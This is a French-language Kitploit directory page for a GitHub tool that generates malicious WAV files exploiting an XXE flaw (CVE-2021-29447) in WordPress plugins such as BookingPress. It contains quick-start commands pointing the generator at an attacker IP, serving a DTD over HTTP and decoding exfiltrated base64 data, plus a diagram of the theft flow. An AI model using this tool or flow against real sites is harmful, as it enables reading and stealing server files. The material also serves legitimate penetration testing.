Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-29447 — A XXE payload generator | Kitploit
Outils/GitHubGitHub/0xricksanchez/cve-2021-29447
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationWeb Security
GitHub0xricksanchez/cve-2021-29447

CVE-2021-29447

A XXE payload generator

Voir le dépôt
il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Générateur d'exploit XXE iXML WAV

Génère des fichiers WAV malveillants qui exploitent des vulnérabilités XXE dans les plugins WordPress analysant les blocs de métadonnées iXML (par exemple, BookingPress < 1.0.11).

Démarrage rapide

root@kitploit:~
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200

# Start HTTP server
python3 -m http.server 9200

# Upload exploit.wav to target
# Monitor logs for data exfiltration

# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d

Flux de travail

root@kitploit:~
┌──────────┐    1. Upload     ┌──────────┐
│ Attacker │ ───exploit.wav──>│  Target  │
└──────────┘                   └──────────┘
     ▲                              │
     │                              │ 2. Parse XML
     │                              │
     │ 3. GET /xxe.dtd             │
     │<─────────────────────────────┘
     │
     │ 4. GET /?p=base64_data
     │<─────────────────────────────┐
     │                              │
     └─ Decode and read file        │

Cibles vulnérables

  • WordPress BookingPress Plugin < 1.0.11
  • Toute application analysant des blocs iXML dans des fichiers WAV sans désactiver les entités externes

Références

  • WPScan Vulnerability DB
  • CVE: CVE-2021-29447
Télécharger l’outil